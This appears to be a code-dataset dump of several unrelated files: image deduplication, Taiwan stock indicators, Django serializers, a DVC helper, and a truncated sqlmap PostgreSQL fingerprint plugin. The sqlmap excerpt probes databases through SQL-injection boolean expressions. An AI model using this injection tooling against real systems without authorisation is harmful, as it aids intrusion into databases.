for cluster_idx, cluster in enumerate(clusters):
cluster_dir = clusters_out_dir / '{}'.format(cluster_idx)
cluster_dir.mkdir(exist_ok=True, parents=True)
for fn in cluster:
src_path = root_dir / fn
copy(src_path, cluster_dir)
if args.dedup:
import random
out_dir = root_dir.parent / '{}_deduped'.format(root_dir.stem)
out_dir.mkdir(exist_ok=True, parents=True)
print('Generating deduplicated images at', out_dir)
sampling = args.cluster_num
if not sampling:
sampling = int(input('Pls give max num of samples you want from each clusters: '))
print('Max num of samples from each cluster:', sampling)
sampled_count = 0
for cluster in clusters:
if len(cluster) > sampling:
sampled = random.sample(cluster, k=sampling)
else:
sampled = cluster
for fn in sampled:
src_path = root_dir / fn
copy(src_path, out_dir)
sampled_count += 1
print('Sampled total count: ', sampled_count)
| 39.948454 | 192 | 0.709935 | import time
import argparse
from pathlib import Path
from shutil import copy
from clustering import clustering
from imagededup.methods import PHash
parser = argparse.ArgumentParser()
parser.add_argument('directory', help='Path to root directory of images')
parser.add_argument('--thresh', help='distance threshold (hamming distance) int between 0 and 64. Default: 10', default=10, type=int)
parser.add_argument('--get-clusters', help='if flagged, will copy images over to <input name>_Dups_thresh{thresh} output folder in their computed clusters subdirectories', action='store_true')
parser.add_argument('--dedup', help='if flagged, will copy images over to <input name>_deduped with images randomly sampled', action='store_true')
parser.add_argument('--cluster-num', help='max num of samples from each cluster (if dedup is flagged).', type=int)
cache_group = parser.add_mutually_exclusive_group()
cache_group.add_argument('--save', help='save encoding map (phash of images) as pkl', action='store_true')
cache_group.add_argument('--load', help='load encoding map (phash of images) from pkl', type=str)
args = parser.parse_args()
dist_thresh = int(args.thresh)
assert 0 <= dist_thresh <=64
root_dir = Path(args.directory)
assert root_dir.is_dir()
out_dir = root_dir.parent / 'Dups_thresh{}'.format(dist_thresh)
phasher = PHash()
if args.load is not None and Path(args.load).is_file():
import pickle
encoding_map = pickle.load(open(args.load, 'rb'))
print(f'Encoding map loaded from pickle file: {args.load}!')
else:
tic = time.perf_counter()
encoding_map = phasher.encode_images(image_dir=root_dir, rglob=True)
toc = time.perf_counter()
print(f'encoding duration: {toc-tic:.3f}s')
if args.save:
import pickle
pickle_file = f"{root_dir.stem}_encoding_map.pkl"
pickle.dump(encoding_map, open(pickle_file,"wb"))
print(f'Encoding map dumped as pickle at: {pickle_file}')
tic = time.perf_counter()
distance_map = phasher.find_duplicates(encoding_map=encoding_map, max_distance_threshold=dist_thresh, scores=True)
toc = time.perf_counter()
print(f'find dups duration: {toc-tic:.3f}s')
tic = time.perf_counter()
clusters = clustering(distance_map)
toc = time.perf_counter()
print(f'clustering duration: {toc-tic:.4f}s')
print('Original number of images:', len(encoding_map))
print('Num of clusters:', len(clusters))
cluster_counts = [ len(x) for x in clusters ]
print('Clusters size distribution:', cluster_counts)
if args.get_clusters:
clusters_out_dir = root_dir.parent / '{}_Dups_thresh{}'.format(root_dir.stem, dist_thresh)
print('Generating clusters at ', clusters_out_dir)
for cluster_idx, cluster in enumerate(clusters):
cluster_dir = clusters_out_dir / '{}'.format(cluster_idx)
cluster_dir.mkdir(exist_ok=True, parents=True)
for fn in cluster:
src_path = root_dir / fn
copy(src_path, cluster_dir)
if args.dedup:
import random
out_dir = root_dir.parent / '{}_deduped'.format(root_dir.stem)
out_dir.mkdir(exist_ok=True, parents=True)
print('Generating deduplicated images at', out_dir)
sampling = args.cluster_num
if not sampling:
sampling = int(input('Pls give max num of samples you want from each clusters: '))
print('Max num of samples from each cluster:', sampling)
sampled_count = 0
for cluster in clusters:
if len(cluster) > sampling:
sampled = random.sample(cluster, k=sampling)
else:
sampled = cluster
for fn in sampled:
src_path = root_dir / fn
copy(src_path, out_dir)
sampled_count += 1
print('Sampled total count: ', sampled_count)
| true | true |
f7fa56f251ff4d397528035160fc02c57dae6c8b | 6,063 | py | Python | Tw.finance.py | yejh90093/Py.finance | e5c660970d4bb890cbf401d288d70829d3e6c966 | [
"Apache-2.0"
] | null | null | null | Tw.finance.py | yejh90093/Py.finance | e5c660970d4bb890cbf401d288d70829d3e6c966 | [
"Apache-2.0"
] | null | null | null | Tw.finance.py | yejh90093/Py.finance | e5c660970d4bb890cbf401d288d70829d3e6c966 | [
"Apache-2.0"
] | null | null | null | import os
import numpy
import requests
import datetime
import time
import math
import pandas as pd
import functions
import xlwt
import numpy as np
from tqdm import tqdm
import gspread
from gspread_dataframe import set_with_dataframe
from oauth2client.service_account import ServiceAccountCredentials
debug_mode = False
save_local_file = False
jump_phase_two = False
start_index = 800
currentDate = datetime.datetime.utcnow()
dateStr = currentDate.strftime("%Y-%m-%d") if not debug_mode else "Debug-" + currentDate.strftime("%Y-%m-%d")
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
credentials = ServiceAccountCredentials.from_json_keyfile_name('tw-finance-f09c6b5d4a8c.json', scope)
gc = gspread.authorize(credentials)
sh = gc.open('Tw-finance')
try:
if debug_mode:
try:
ws = sh.worksheet(dateStr)
sh.del_worksheet(ws)
print("Delete exist sheet: " + dateStr)
except:
print("Create new sheet: " + dateStr)
ws = sh.add_worksheet(title=dateStr, rows='1000', cols='12')
except Exception as e:
print(e)
print("Cannot add worksheet. Please check if the sheet already exist.")
exit(1)
pbar = tqdm(total=972)
now = datetime.datetime.now()
dayStart = str(int(time.time()))
dayEnd = str(int(time.time()) - 8640000)
monthEnd = str(int(time.time()) - 686400000)
all = functions.readAll()
resultDic = {}
idArr = []
tempArr = []
nameArr = []
dayWilliamsRArr = []
dayRSIArr = []
monthRSIArr = []
monthMTMArr = []
monthDMIArr_plus = []
monthDMIArr_minus = []
process = 0
# print(all.keys())
for value in all.values:
pbar.update(1)
if debug_mode and pbar.n < start_index:
continue
tempArr.append(value[0])
nameArr.append(value[1])
responseDay = functions.getFinanceData(value[0], dayStart, dayEnd, "1d")
try:
dataArrayDay = functions.dataTextToArray(responseDay.text)
except:
sh.del_worksheet(ws)
print()
print("ERROR: dataTextToArray responseDay. Invalid cookie.")
break #exit(1)
arrWilliamsR = functions.arrayWilliamsR(dataArrayDay, 50)
arrRSI = functions.arrayRSI(dataArrayDay, 60)
dayWilliamsR = arrWilliamsR[len(arrWilliamsR) - 1][9]
dayRSI = arrRSI[len(arrRSI) - 1][7]
dayWilliamsRArr.append(dayWilliamsR)
dayRSIArr.append(dayRSI)
responseMonth = functions.getFinanceData(value[0], dayStart, monthEnd, "1mo")
try:
dataArrayMonth = functions.dataTextToArray(responseMonth.text)
except:
sh.del_worksheet(ws)
print()
print("ERROR: dataTextToArray responseMonth. Invalid cookie.")
break #exit(1)
arrSize = len(dataArrayMonth)
if arrSize >= 2:
if dataArrayMonth[arrSize - 1][2] < dataArrayMonth[arrSize - 2][2]:
dataArrayMonth[arrSize - 1][2] = dataArrayMonth[arrSize - 2][2]
if dataArrayMonth[arrSize - 1][3] > dataArrayMonth[arrSize - 2][3]:
dataArrayMonth[arrSize - 1][3] = dataArrayMonth[arrSize - 2][3]
dataArrayMonth = np.delete(dataArrayMonth, len(dataArrayMonth) - 2, axis=0)
# print (responseMonth.text)
# print (dataArrayMonth)
arrRSIMonth = functions.arrayRSI(dataArrayMonth, 4)
arrDMIMonth = functions.arrayDMI(dataArrayMonth, 1)
arrMTMMonth = functions.arrayMTM(dataArrayMonth, 3, 2)
if len(arrRSIMonth) <= 1:
monthRSI = None
else:
monthRSI = arrRSIMonth[len(arrRSIMonth) - 1][7]
if len(arrDMIMonth) <= 1:
monthDMI = None
else:
monthDMI_plus = arrDMIMonth[len(arrDMIMonth) - 1][7]
monthDMI_minus = arrDMIMonth[len(arrDMIMonth) - 1][8]
if len(arrMTMMonth) <= 1:
monthMTM = None
else:
monthMTM = arrMTMMonth[len(arrMTMMonth) - 1][9]
monthRSIArr.append(monthRSI)
monthMTMArr.append(monthMTM)
monthDMIArr_plus.append(monthDMI_plus)
monthDMIArr_minus.append(monthDMI_minus)
process = process + 1
if debug_mode and process > 30:
break
resultDic['monthRSI'] = monthRSIArr
resultDic['monthMTM'] = monthMTMArr
resultDic['monthDMI_plus'] = monthDMIArr_plus
resultDic['monthDMI_minus'] = monthDMIArr_minus
resultDic['dayRSI'] = dayRSIArr
resultDic['dayWilliamsR'] = dayWilliamsRArr
resultDic[all.keys()[1]] = nameArr
resultDic[all.keys()[0]] = tempArr
resultDF = pd.DataFrame(resultDic)
pbar.close()
# print (resultDF)
resultDF = resultDF.reindex(
columns=['證券代號', '證券名稱', 'dayWilliamsR', 'dayRSI', 'monthRSI', 'monthDMI_plus', 'monthDMI_minus', 'monthMTM'])
accordDic = resultDF[resultDF.monthRSI > 77]
accordDic = accordDic[accordDic.dayRSI > 57]
accordDic = accordDic[accordDic.dayWilliamsR < 20]
# print(accordDic)
if save_local_file:
resultDF.to_excel('all_results_last.xls', sheet_name=dateStr)
functions.append_df_to_excel('log_results.xlsx', accordDic, sheet_name=dateStr, index=False)
set_with_dataframe(ws, accordDic, row=1, col=1, include_index=True, include_column_header=True)
# print(accordDic)
listMACDWeekDiff = []
listMACDWeekDirection = []
pbar_MACD = tqdm(total=len(accordDic))
for index, row in accordDic.iterrows():
# print(index, row['證券代號'], row['證券名稱'])
responseWeek = functions.getFinanceData(row['證券代號'], dayStart, monthEnd, "1mo")
try:
dataArrayWeek = functions.dataTextToArray(responseWeek.text)
except:
# sh.del_worksheet(ws)
print()
print("ERROR: dataTextToArray responseMonth. Invalid cookie.")
exit(1)
arrMACDWeek = functions.arrayMACD(dataArrayWeek, 12, 26, 9)
if len(arrMACDWeek)>0:
#print(arrMACDWeek[len(arrMACDWeek)-1])
listMACDWeekDiff.append(arrMACDWeek[len(arrMACDWeek)-1][9])
listMACDWeekDirection.append(arrMACDWeek[len(arrMACDWeek)-1][10])
pbar_MACD.update(1)
accordDic['MACD_Diff'] = list(pd.Series(listMACDWeekDiff))
accordDic['MACD_Direction'] = list(pd.Series(listMACDWeekDirection))
#print(accordDic)
set_with_dataframe(ws, accordDic, row=1, col=1, include_index=True, include_column_header=True)
pbar_MACD.close()
| 29.289855 | 114 | 0.697674 | import os
import numpy
import requests
import datetime
import time
import math
import pandas as pd
import functions
import xlwt
import numpy as np
from tqdm import tqdm
import gspread
from gspread_dataframe import set_with_dataframe
from oauth2client.service_account import ServiceAccountCredentials
debug_mode = False
save_local_file = False
jump_phase_two = False
start_index = 800
currentDate = datetime.datetime.utcnow()
dateStr = currentDate.strftime("%Y-%m-%d") if not debug_mode else "Debug-" + currentDate.strftime("%Y-%m-%d")
scope = ['https://spreadsheets.google.com/feeds', 'https://www.googleapis.com/auth/drive']
credentials = ServiceAccountCredentials.from_json_keyfile_name('tw-finance-f09c6b5d4a8c.json', scope)
gc = gspread.authorize(credentials)
sh = gc.open('Tw-finance')
try:
if debug_mode:
try:
ws = sh.worksheet(dateStr)
sh.del_worksheet(ws)
print("Delete exist sheet: " + dateStr)
except:
print("Create new sheet: " + dateStr)
ws = sh.add_worksheet(title=dateStr, rows='1000', cols='12')
except Exception as e:
print(e)
print("Cannot add worksheet. Please check if the sheet already exist.")
exit(1)
pbar = tqdm(total=972)
now = datetime.datetime.now()
dayStart = str(int(time.time()))
dayEnd = str(int(time.time()) - 8640000)
monthEnd = str(int(time.time()) - 686400000)
all = functions.readAll()
resultDic = {}
idArr = []
tempArr = []
nameArr = []
dayWilliamsRArr = []
dayRSIArr = []
monthRSIArr = []
monthMTMArr = []
monthDMIArr_plus = []
monthDMIArr_minus = []
process = 0
for value in all.values:
pbar.update(1)
if debug_mode and pbar.n < start_index:
continue
tempArr.append(value[0])
nameArr.append(value[1])
responseDay = functions.getFinanceData(value[0], dayStart, dayEnd, "1d")
try:
dataArrayDay = functions.dataTextToArray(responseDay.text)
except:
sh.del_worksheet(ws)
print()
print("ERROR: dataTextToArray responseDay. Invalid cookie.")
break
arrWilliamsR = functions.arrayWilliamsR(dataArrayDay, 50)
arrRSI = functions.arrayRSI(dataArrayDay, 60)
dayWilliamsR = arrWilliamsR[len(arrWilliamsR) - 1][9]
dayRSI = arrRSI[len(arrRSI) - 1][7]
dayWilliamsRArr.append(dayWilliamsR)
dayRSIArr.append(dayRSI)
responseMonth = functions.getFinanceData(value[0], dayStart, monthEnd, "1mo")
try:
dataArrayMonth = functions.dataTextToArray(responseMonth.text)
except:
sh.del_worksheet(ws)
print()
print("ERROR: dataTextToArray responseMonth. Invalid cookie.")
break
arrSize = len(dataArrayMonth)
if arrSize >= 2:
if dataArrayMonth[arrSize - 1][2] < dataArrayMonth[arrSize - 2][2]:
dataArrayMonth[arrSize - 1][2] = dataArrayMonth[arrSize - 2][2]
if dataArrayMonth[arrSize - 1][3] > dataArrayMonth[arrSize - 2][3]:
dataArrayMonth[arrSize - 1][3] = dataArrayMonth[arrSize - 2][3]
dataArrayMonth = np.delete(dataArrayMonth, len(dataArrayMonth) - 2, axis=0)
arrRSIMonth = functions.arrayRSI(dataArrayMonth, 4)
arrDMIMonth = functions.arrayDMI(dataArrayMonth, 1)
arrMTMMonth = functions.arrayMTM(dataArrayMonth, 3, 2)
if len(arrRSIMonth) <= 1:
monthRSI = None
else:
monthRSI = arrRSIMonth[len(arrRSIMonth) - 1][7]
if len(arrDMIMonth) <= 1:
monthDMI = None
else:
monthDMI_plus = arrDMIMonth[len(arrDMIMonth) - 1][7]
monthDMI_minus = arrDMIMonth[len(arrDMIMonth) - 1][8]
if len(arrMTMMonth) <= 1:
monthMTM = None
else:
monthMTM = arrMTMMonth[len(arrMTMMonth) - 1][9]
monthRSIArr.append(monthRSI)
monthMTMArr.append(monthMTM)
monthDMIArr_plus.append(monthDMI_plus)
monthDMIArr_minus.append(monthDMI_minus)
process = process + 1
if debug_mode and process > 30:
break
resultDic['monthRSI'] = monthRSIArr
resultDic['monthMTM'] = monthMTMArr
resultDic['monthDMI_plus'] = monthDMIArr_plus
resultDic['monthDMI_minus'] = monthDMIArr_minus
resultDic['dayRSI'] = dayRSIArr
resultDic['dayWilliamsR'] = dayWilliamsRArr
resultDic[all.keys()[1]] = nameArr
resultDic[all.keys()[0]] = tempArr
resultDF = pd.DataFrame(resultDic)
pbar.close()
resultDF = resultDF.reindex(
columns=['證券代號', '證券名稱', 'dayWilliamsR', 'dayRSI', 'monthRSI', 'monthDMI_plus', 'monthDMI_minus', 'monthMTM'])
accordDic = resultDF[resultDF.monthRSI > 77]
accordDic = accordDic[accordDic.dayRSI > 57]
accordDic = accordDic[accordDic.dayWilliamsR < 20]
if save_local_file:
resultDF.to_excel('all_results_last.xls', sheet_name=dateStr)
functions.append_df_to_excel('log_results.xlsx', accordDic, sheet_name=dateStr, index=False)
set_with_dataframe(ws, accordDic, row=1, col=1, include_index=True, include_column_header=True)
listMACDWeekDiff = []
listMACDWeekDirection = []
pbar_MACD = tqdm(total=len(accordDic))
for index, row in accordDic.iterrows():
responseWeek = functions.getFinanceData(row['證券代號'], dayStart, monthEnd, "1mo")
try:
dataArrayWeek = functions.dataTextToArray(responseWeek.text)
except:
print()
print("ERROR: dataTextToArray responseMonth. Invalid cookie.")
exit(1)
arrMACDWeek = functions.arrayMACD(dataArrayWeek, 12, 26, 9)
if len(arrMACDWeek)>0:
listMACDWeekDiff.append(arrMACDWeek[len(arrMACDWeek)-1][9])
listMACDWeekDirection.append(arrMACDWeek[len(arrMACDWeek)-1][10])
pbar_MACD.update(1)
accordDic['MACD_Diff'] = list(pd.Series(listMACDWeekDiff))
accordDic['MACD_Direction'] = list(pd.Series(listMACDWeekDirection))
set_with_dataframe(ws, accordDic, row=1, col=1, include_index=True, include_column_header=True)
pbar_MACD.close()
| true | true |
f7fa56f85ee4447930f9aa334e3348214a0600f9 | 5,500 | py | Python | campaigns/serializers.py | alimahdiyar/Developing-Community-Web | a663a687e0f286f197d4a7bf347f67cd130275f7 | [
"MIT"
] | 2 | 2018-06-02T12:30:00.000Z | 2018-07-19T14:41:39.000Z | campaigns/serializers.py | Developing-Community/Developing-Community-Web | a663a687e0f286f197d4a7bf347f67cd130275f7 | [
"MIT"
] | 5 | 2021-06-08T19:09:00.000Z | 2022-03-11T23:25:14.000Z | campaigns/serializers.py | Developing-Community/web | a663a687e0f286f197d4a7bf347f67cd130275f7 | [
"MIT"
] | 2 | 2018-05-27T14:58:34.000Z | 2018-05-27T15:03:04.000Z | from django.contrib.auth import get_user_model
from django.contrib.contenttypes.models import ContentType
from enumfields.drf.serializers import EnumSupportSerializerMixin
from rest_framework.fields import SerializerMethodField
from rest_framework.serializers import (
ModelSerializer
)
from sorl_thumbnail_serializer.fields import HyperlinkedSorlImageField
from campaigns.models import Product, Campaign, CampaignPartyRelation, CampaignPartyRelationType, \
CampaignEnrollmentRequest
from team.serializers import TeamListSerializer
User = get_user_model()
class CampaignCreateSerializer(EnumSupportSerializerMixin, ModelSerializer):
class Meta:
model = Campaign
fields = [
'id',
'title',
'start_time',
'end_time',
'description',
]
class CampaignListSerializer(EnumSupportSerializerMixin, ModelSerializer):
creator = SerializerMethodField()
# A thumbnail image, sorl options and read-only
thumbnail = HyperlinkedSorlImageField(
'500x500',
options={"crop": "center"},
source='image',
read_only=True
)
class Meta:
model = Campaign
fields = [
'id',
'title',
'creator',
'start_time',
'end_time',
'description',
'thumbnail',
'image',
'width_field',
'height_field',
]
read_only_fields = [
'thumbnail',
'image',
'width_field',
'height_field',
]
def get_creator(self, obj):
return CampaignPartyRelation.objects.get(
campaign=obj,
type=CampaignPartyRelationType.CREATOR,
).content_object.name
class CampaignUpdateSerializer(EnumSupportSerializerMixin, ModelSerializer):
class Meta:
model = Campaign
fields = [
'id',
'title',
'start_time',
'end_time',
'description',
]
class CampaignDetailSerializer(EnumSupportSerializerMixin, ModelSerializer):
accessable = SerializerMethodField()
creator = SerializerMethodField()
requested = SerializerMethodField()
enrolled = SerializerMethodField()
# A thumbnail image, sorl options and read-only
thumbnail = HyperlinkedSorlImageField(
'500x500',
options={"crop": "center"},
source='profile_image',
read_only=True
)
# A larger version of the image, allows writing
# profile_image = HyperlinkedSorlImageField('1024')
class Meta:
model = Campaign
fields = [
'id',
'title',
'creator',
'type',
'description',
'start_time',
'end_time',
'accessable',
'requested',
'enrolled',
'thumbnail',
'image',
'width_field',
'height_field',
]
read_only_fields = [
'thumbnail',
'image',
'width_field',
'height_field',
]
def get_accessable(self, obj):
user = self.context.get('request').user
if user.is_authenticated and CampaignPartyRelation.objects.filter(
campaign=obj,
type=CampaignPartyRelationType.CREATOR,
content_type=ContentType.objects.get(model="profile"),
object_id=user.id
).exists():
return True
return False
def get_creator(self, obj):
return CampaignPartyRelation.objects.get(
campaign=obj,
type=CampaignPartyRelationType.CREATOR,
).content_object.name
def get_requested(self, obj):
user = self.context.get('request').user
if user.is_authenticated and CampaignEnrollmentRequest.objects.filter(
campaign=obj,
user=user
).exists():
return True
return False
def get_enrolled(self, obj):
user = self.context.get('request').user
if user.is_authenticated and CampaignPartyRelation.objects.filter(
campaign=obj,
type=CampaignPartyRelationType.MEMBER,
content_type=ContentType.objects.get(model="user"),
object_id=user.id
).exists():
return True
return False
class CampaignImageUpdateRetriveSerializer(ModelSerializer):
class Meta:
model = Campaign
fields = [
'image',
'width_field',
'height_field',
]
read_only_fields = [
'width_field',
'height_field',
]
class CampaignDeleteSerializer(EnumSupportSerializerMixin, ModelSerializer):
class Meta:
model = Campaign
fields = [
'id',
]
class CampaignRequestEnrollmentSerializer(ModelSerializer):
class Meta:
model = CampaignEnrollmentRequest
fields = [
'note'
]
class ProductCreateSerializer(ModelSerializer):
class Meta:
model = Product
fields = [
'name',
'description',
'price'
]
class ProductListSerializer(ModelSerializer):
seller = TeamListSerializer()
class Meta:
model = Product
fields = [
'seller',
'id',
'name',
'description',
'price'
]
| 25.700935 | 99 | 0.578182 | from django.contrib.auth import get_user_model
from django.contrib.contenttypes.models import ContentType
from enumfields.drf.serializers import EnumSupportSerializerMixin
from rest_framework.fields import SerializerMethodField
from rest_framework.serializers import (
ModelSerializer
)
from sorl_thumbnail_serializer.fields import HyperlinkedSorlImageField
from campaigns.models import Product, Campaign, CampaignPartyRelation, CampaignPartyRelationType, \
CampaignEnrollmentRequest
from team.serializers import TeamListSerializer
User = get_user_model()
class CampaignCreateSerializer(EnumSupportSerializerMixin, ModelSerializer):
class Meta:
model = Campaign
fields = [
'id',
'title',
'start_time',
'end_time',
'description',
]
class CampaignListSerializer(EnumSupportSerializerMixin, ModelSerializer):
creator = SerializerMethodField()
thumbnail = HyperlinkedSorlImageField(
'500x500',
options={"crop": "center"},
source='image',
read_only=True
)
class Meta:
model = Campaign
fields = [
'id',
'title',
'creator',
'start_time',
'end_time',
'description',
'thumbnail',
'image',
'width_field',
'height_field',
]
read_only_fields = [
'thumbnail',
'image',
'width_field',
'height_field',
]
def get_creator(self, obj):
return CampaignPartyRelation.objects.get(
campaign=obj,
type=CampaignPartyRelationType.CREATOR,
).content_object.name
class CampaignUpdateSerializer(EnumSupportSerializerMixin, ModelSerializer):
class Meta:
model = Campaign
fields = [
'id',
'title',
'start_time',
'end_time',
'description',
]
class CampaignDetailSerializer(EnumSupportSerializerMixin, ModelSerializer):
accessable = SerializerMethodField()
creator = SerializerMethodField()
requested = SerializerMethodField()
enrolled = SerializerMethodField()
thumbnail = HyperlinkedSorlImageField(
'500x500',
options={"crop": "center"},
source='profile_image',
read_only=True
)
class Meta:
model = Campaign
fields = [
'id',
'title',
'creator',
'type',
'description',
'start_time',
'end_time',
'accessable',
'requested',
'enrolled',
'thumbnail',
'image',
'width_field',
'height_field',
]
read_only_fields = [
'thumbnail',
'image',
'width_field',
'height_field',
]
def get_accessable(self, obj):
user = self.context.get('request').user
if user.is_authenticated and CampaignPartyRelation.objects.filter(
campaign=obj,
type=CampaignPartyRelationType.CREATOR,
content_type=ContentType.objects.get(model="profile"),
object_id=user.id
).exists():
return True
return False
def get_creator(self, obj):
return CampaignPartyRelation.objects.get(
campaign=obj,
type=CampaignPartyRelationType.CREATOR,
).content_object.name
def get_requested(self, obj):
user = self.context.get('request').user
if user.is_authenticated and CampaignEnrollmentRequest.objects.filter(
campaign=obj,
user=user
).exists():
return True
return False
def get_enrolled(self, obj):
user = self.context.get('request').user
if user.is_authenticated and CampaignPartyRelation.objects.filter(
campaign=obj,
type=CampaignPartyRelationType.MEMBER,
content_type=ContentType.objects.get(model="user"),
object_id=user.id
).exists():
return True
return False
class CampaignImageUpdateRetriveSerializer(ModelSerializer):
class Meta:
model = Campaign
fields = [
'image',
'width_field',
'height_field',
]
read_only_fields = [
'width_field',
'height_field',
]
class CampaignDeleteSerializer(EnumSupportSerializerMixin, ModelSerializer):
class Meta:
model = Campaign
fields = [
'id',
]
class CampaignRequestEnrollmentSerializer(ModelSerializer):
class Meta:
model = CampaignEnrollmentRequest
fields = [
'note'
]
class ProductCreateSerializer(ModelSerializer):
class Meta:
model = Product
fields = [
'name',
'description',
'price'
]
class ProductListSerializer(ModelSerializer):
seller = TeamListSerializer()
class Meta:
model = Product
fields = [
'seller',
'id',
'name',
'description',
'price'
]
| true | true |
f7fa577bbe138646112aa69c5b9324924fbdd88d | 483 | py | Python | data_into_dvc.py | EAKSHITHA/mlops_main | 84c5fe417e138ef3cbef1bf299ad653e60a6644a | [
"MIT"
] | null | null | null | data_into_dvc.py | EAKSHITHA/mlops_main | 84c5fe417e138ef3cbef1bf299ad653e60a6644a | [
"MIT"
] | null | null | null | data_into_dvc.py | EAKSHITHA/mlops_main | 84c5fe417e138ef3cbef1bf299ad653e60a6644a | [
"MIT"
] | null | null | null | # NOTE: For windows user-
# This file must be created in the root of the project
# where Training and Prediction batch file as are present
import os
from glob import glob
from tqdm import tqdm
data_dirs = ["Training_Batch_Files","Prediction_Batch_files"]
for data_dir in data_dirs:
files = glob(data_dir + r"/*.csv")
for filePath in tqdm(files):
# print(f"dvc add {filePath}")
os.system(f"dvc add {filePath}")
print("\n #### all files added to dvc ####") | 28.411765 | 61 | 0.691511 |
import os
from glob import glob
from tqdm import tqdm
data_dirs = ["Training_Batch_Files","Prediction_Batch_files"]
for data_dir in data_dirs:
files = glob(data_dir + r"/*.csv")
for filePath in tqdm(files):
os.system(f"dvc add {filePath}")
print("\n #### all files added to dvc ####") | true | true |
f7fa57c65892d5f11374402f2ee7beaa40568a84 | 9,544 | py | Python | packages/sqlmap-master/plugins/dbms/postgresql/fingerprint.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | null | null | null | packages/sqlmap-master/plugins/dbms/postgresql/fingerprint.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | null | null | null | packages/sqlmap-master/plugins/dbms/postgresql/fingerprint.py | ZooAtmosphereGroup/HelloPackages | 0ccffd33bf927b13d28c8f715ed35004c33465d9 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
from lib.core.common import Backend
from lib.core.common import Format
from lib.core.common import hashDBRetrieve
from lib.core.common import hashDBWrite
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.enums import DBMS
from lib.core.enums import FORK
from lib.core.enums import HASHDB_KEYS
from lib.core.enums import OS
from lib.core.session import setDbms
from lib.core.settings import PGSQL_ALIASES
from lib.request import inject
from plugins.generic.fingerprint import Fingerprint as GenericFingerprint
class Fingerprint(GenericFingerprint):
def __init__(self):
GenericFingerprint.__init__(self, DBMS.PGSQL)
def getFingerprint(self):
fork = hashDBRetrieve(HASHDB_KEYS.DBMS_FORK)
if fork is None:
if inject.checkBooleanExpression("VERSION() LIKE '%CockroachDB%'"):
fork = FORK.COCKROACHDB
elif inject.checkBooleanExpression("VERSION() LIKE '%Redshift%'"): # Reference: https://dataedo.com/kb/query/amazon-redshift/check-server-version
fork = FORK.REDSHIFT
elif inject.checkBooleanExpression("VERSION() LIKE '%Greenplum%'"): # Reference: http://www.sqldbpros.com/wordpress/wp-content/uploads/2014/08/what-version-of-greenplum.png
fork = FORK.GREENPLUM
elif inject.checkBooleanExpression("VERSION() LIKE '%Yellowbrick%'"): # Reference: https://www.yellowbrick.com/docs/3.3/ybd_sqlref/version.html
fork = FORK.YELLOWBRICK
elif inject.checkBooleanExpression("VERSION() LIKE '%EnterpriseDB%'"): # Reference: https://www.enterprisedb.com/edb-docs/d/edb-postgres-advanced-server/user-guides/user-guide/11/EDB_Postgres_Advanced_Server_Guide.1.087.html
fork = FORK.ENTERPRISEDB
elif inject.checkBooleanExpression("VERSION() LIKE '%YB-%'"): # Reference: https://github.com/yugabyte/yugabyte-db/issues/2447#issue-499562926
fork = FORK.YUGABYTEDB
elif inject.checkBooleanExpression("AURORA_VERSION() LIKE '%'"): # Reference: https://aws.amazon.com/premiumsupport/knowledge-center/aurora-version-number/
fork = FORK.AURORA
else:
fork = ""
hashDBWrite(HASHDB_KEYS.DBMS_FORK, fork)
value = ""
wsOsFp = Format.getOs("web server", kb.headersFp)
if wsOsFp:
value += "%s\n" % wsOsFp
if kb.data.banner:
dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp)
if dbmsOsFp:
value += "%s\n" % dbmsOsFp
value += "back-end DBMS: "
if not conf.extensiveFp:
value += DBMS.PGSQL
if fork:
value += " (%s fork)" % fork
return value
actVer = Format.getDbms()
blank = " " * 15
value += "active fingerprint: %s" % actVer
if kb.bannerFp:
banVer = kb.bannerFp.get("dbmsVersion")
if banVer:
banVer = Format.getDbms([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
htmlErrorFp = Format.getErrorParsedDBMSes()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
if fork:
value += "\n%sfork fingerprint: %s" % (blank, fork)
return value
def checkDbms(self):
"""
References for fingerprint:
* https://www.postgresql.org/docs/current/static/release.html
"""
if not conf.extensiveFp and Backend.isDbmsWithin(PGSQL_ALIASES):
setDbms(DBMS.PGSQL)
self.getBanner()
return True
infoMsg = "testing %s" % DBMS.PGSQL
logger.info(infoMsg)
# NOTE: Vertica works too without the CONVERT_TO()
result = inject.checkBooleanExpression("CONVERT_TO('[RANDSTR]', QUOTE_IDENT(NULL)) IS NULL")
if result:
infoMsg = "confirming %s" % DBMS.PGSQL
logger.info(infoMsg)
result = inject.checkBooleanExpression("COALESCE([RANDNUM], NULL)=[RANDNUM]")
if not result:
warnMsg = "the back-end DBMS is not %s" % DBMS.PGSQL
logger.warn(warnMsg)
return False
setDbms(DBMS.PGSQL)
self.getBanner()
if not conf.extensiveFp:
return True
infoMsg = "actively fingerprinting %s" % DBMS.PGSQL
logger.info(infoMsg)
if inject.checkBooleanExpression("GEN_RANDOM_UUID() IS NOT NULL"):
Backend.setVersion(">= 13.0")
elif inject.checkBooleanExpression("SINH(0)=0"):
Backend.setVersion(">= 12.0")
elif inject.checkBooleanExpression("SHA256(NULL) IS NULL"):
Backend.setVersion(">= 11.0")
elif inject.checkBooleanExpression("XMLTABLE(NULL) IS NULL"):
Backend.setVersionList([">= 10.0", "< 11.0"])
elif inject.checkBooleanExpression("SIND(0)=0"):
Backend.setVersionList([">= 9.6.0", "< 10.0"])
elif inject.checkBooleanExpression("TO_JSONB(1) IS NOT NULL"):
Backend.setVersionList([">= 9.5.0", "< 9.6.0"])
elif inject.checkBooleanExpression("JSON_TYPEOF(NULL) IS NULL"):
Backend.setVersionList([">= 9.4.0", "< 9.5.0"])
elif inject.checkBooleanExpression("ARRAY_REPLACE(NULL,1,1) IS NULL"):
Backend.setVersionList([">= 9.3.0", "< 9.4.0"])
elif inject.checkBooleanExpression("ROW_TO_JSON(NULL) IS NULL"):
